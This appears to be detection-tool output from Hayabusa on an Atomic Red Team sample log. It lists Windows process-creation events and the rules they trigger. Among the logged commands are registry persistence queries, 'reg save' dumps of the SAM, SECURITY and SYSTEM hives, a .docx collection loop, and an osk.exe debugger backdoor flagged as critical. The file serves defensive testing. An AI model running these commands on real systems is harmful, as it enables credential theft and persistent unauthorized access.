+2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.619 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:33.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\Security security.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\Security security.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.229 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:39.255 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\System system.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\System system.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:41.691 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  save HKLM\SAM sam.hive  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg save HKLM\SAM sam.hive""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:43.569 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:51.996 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe  /S /D /c"" dir c: /b /s .docx ""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.048 +09:00,MSEDGEWIN10,1,medium,Automated Collection Command Prompt,,rules/sigma/process_creation/process_creation_automated_collection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.053 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr  /e .docx  :  Path: C:\Windows\System32\findstr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c: /b /s .docx | findstr /e .docx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.210 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""for /R c: %%f in (*.docx) do copy %%f c:\temp\""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:49:52.275 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.174 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg add "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution ""Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
+2019-07-19 23:50:02.220 +09:00,MSEDGEWIN10,13,critical,Sticky Key Like Backdoor Usage,,rules/sigma/registry_event/registry_event_stickykey_like_backdoor.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
